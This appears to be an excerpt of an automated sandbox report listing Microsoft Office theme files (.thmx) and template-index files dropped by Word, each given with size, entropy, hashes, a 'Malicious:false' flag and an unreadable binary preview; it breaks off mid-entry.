                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):486596
                            Entropy (8bit):7.668294441507828
                            Encrypted:false
                            SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                            MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                            SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                            SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                            SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                            Malicious:false
                            Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):274
                            Entropy (8bit):3.535303979138867
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                            MD5:35AFE8D8724F3E19EB08274906926A0B
                            SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                            SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                            SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):570901
                            Entropy (8bit):7.674434888248144
                            Encrypted:false
                            SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                            MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                            SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                            SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                            SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):3.5459495297497368
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                            MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                            SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                            SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                            SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1649585
                            Entropy (8bit):7.875240099125746
                            Encrypted:false
                            SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                            MD5:35200E94CEB3BB7A8B34B4E93E039023
                            SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                            SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                            SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                            Malicious:false
                            Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):284
                            Entropy (8bit):3.5552837910707304
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                            MD5:5728F26DF04D174DE9BDFF51D0668E2A
                            SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                            SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                            SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):924687
                            Entropy (8bit):7.824849396154325
                            Encrypted:false
                            SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                            MD5:97EEC245165F2296139EF8D4D43BBB66
                            SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                            SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                            SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                            Malicious:false
                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):3.51145753448333
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                            MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                            SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                            SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                            SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1204049
                            Entropy (8bit):7.92476783994848
                            Encrypted:false
                            SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                            MD5:FD5BBC58056522847B3B75750603DF0C
                            SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                            SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                            SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                            Malicious:false
                            Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):276
                            Entropy (8bit):3.5364757859412563
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                            MD5:CD465E8DA15E26569897213CA9F6BC9C
                            SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                            SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                            SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):608122
                            Entropy (8bit):7.729143855239127
                            Encrypted:false
                            SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                            MD5:8BA551EEC497947FC39D1D48EC868B54
                            SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                            SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                            SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                            Malicious:false
                            Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):278
                            Entropy (8bit):3.516359852766808
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                            MD5:960E28B1E0AB3522A8A8558C02694ECF
                            SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                            SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                            SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):976001
                            Entropy (8bit):7.791956689344336
                            Encrypted:false
                            SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                            MD5:9E563D44C28B9632A7CF4BD046161994
                            SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                            SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                            SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):278
                            Entropy (8bit):3.5270134268591966
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                            MD5:327DA4A5C757C0F1449976BE82653129
                            SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                            SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                            SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):966946
                            Entropy (8bit):7.8785200658952
                            Encrypted:false
                            SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                            MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                            SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                            SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                            SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                            Malicious:false
                            Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):3.5323495192404475
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                            MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                            SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                            SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                            SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1750795
                            Entropy (8bit):7.892395931401988
                            Encrypted:false
                            SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                            MD5:529795E0B55926752462CBF32C14E738
                            SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                            SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                            SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):280
                            Entropy (8bit):3.528155916440219
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                            MD5:AA7B919B21FD42C457948DE1E2988CB3
                            SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
